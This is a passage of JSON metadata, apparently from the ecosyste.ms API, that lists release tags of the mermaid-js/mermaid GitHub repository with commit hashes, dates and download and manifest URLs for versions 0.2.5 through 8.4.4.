it","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","